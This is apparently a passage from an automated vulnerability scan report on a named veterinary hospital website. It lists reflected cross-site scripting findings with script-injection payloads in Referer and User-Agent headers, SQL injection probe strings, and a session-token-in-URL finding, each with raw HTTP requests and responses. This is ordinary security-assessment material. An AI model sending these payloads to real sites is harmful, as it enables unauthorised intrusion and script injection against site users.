HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:29 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21679 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e " />...[SNIP]...
2.132. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [User-Agent HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /manhattan-veterinary-group/appt.html
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563f8"><script>alert(1)</script>d249be92d3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /manhattan-veterinary-group/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13563f8"><script>alert(1)</script>d249be92d3d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:17 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21642 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13563f8"><script>alert(1)</script>d249be92d3d " />...[SNIP]...
2.133. http://www.vcahospitals.com/marshfield/appt.html [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /marshfield/appt.html
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e160"><script>alert(1)</script>15cad895a97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /marshfield/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:29 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21656 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97 " />...[SNIP]...
2.134. http://www.vcahospitals.com/marshfield/appt.html [User-Agent HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /marshfield/appt.html
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca082"><script>alert(1)</script>1249627b9a5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /marshfield/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/marshfield Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:23 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21657 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5 " />...[SNIP]...
2.135. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80127"><script>alert(1)</script>19dd3cfa8d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /new-york-veterinary-hospital/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665 Referer: http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:29 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21488 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8 " />...[SNIP]...
2.136. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [User-Agent HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec59a"><script>alert(1)</script>132741cca0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /new-york-veterinary-hospital/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:13 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21451 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f " />...[SNIP]...
2.137. http://www.vcahospitals.com/plymouth/appt.html [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth/appt.html
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483eb"><script>alert(1)</script>df4b8d58b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /plymouth/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665 Referer: http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:12 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 22040 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d " />...[SNIP]...
2.138. http://www.vcahospitals.com/plymouth/appt.html [User-Agent HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth/appt.html
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01dc"><script>alert(1)</script>4fe18f93ad was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /plymouth/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:04 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 22002 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad " />...[SNIP]...
3. SQL statement in request parameter
There are 4 instances of this issue:
Issue description
The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection. You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.
Issue remediation
The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.
3.1. http://www.vcahospitals.com/main/offer
Summary
Severity: Medium
Confidence: Tentative
Host: http://www.vcahospitals.com
Path: /main/offer
Request
GET /main/offer?=(select +convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM +syscolumns)&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:20 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14753 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
3.2. http://www.vcahospitals.com/main/offer/
Summary
Severity: Medium
Confidence: Tentative
Host: http://www.vcahospitals.com
Path: /main/offer/
Request
GET /main/offer/?=(select +convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM +syscolumns)&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:20 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14946 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
3.3. http://www.vcahospitals.com/main/offer/thank-you.html
Summary
Severity: Medium
Confidence: Tentative
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Request
GET /main/offer/thank-you.html?addr=(select +convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM +syscolumns)&city=3&date=1307084400&email=netsparker@example.com&fname=Ronald%20Smith&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=Ronald%20Smith&newmex=0&optin=3&other=3&petage=3&petname=Ronald%20Smith&pettype=3&phone=3&referer=3&state=3&submit=Get+FREE+Coupon&token=d3e0554c85710ed27c818f2709c92045&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=3&zip=3 HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:24 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3161 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
3.4. http://www.vcahospitals.com/tools/markers_sema.php
Summary
Severity: Medium
Confidence: Tentative
Host: http://www.vcahospitals.com
Path: /tools/markers_sema.php
Request
GET /tools/markers_sema.php?sema=(select +convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM +syscolumns) HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=gnrb178du6ouqlhertfrhhq1v7 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:52 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 65 Content-Type: text/xml <?xml version="1.0" encoding="ISO-8859-1"?> <markers> </markers>
4. Session token in URL
There are 6 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
4.1. http://www.vcahospitals.com/hanson/appt.html
Summary
Severity: Medium
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The URL in the request appears to contain a session token within the query string:http://www.vcahospitals.com/hanson/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1
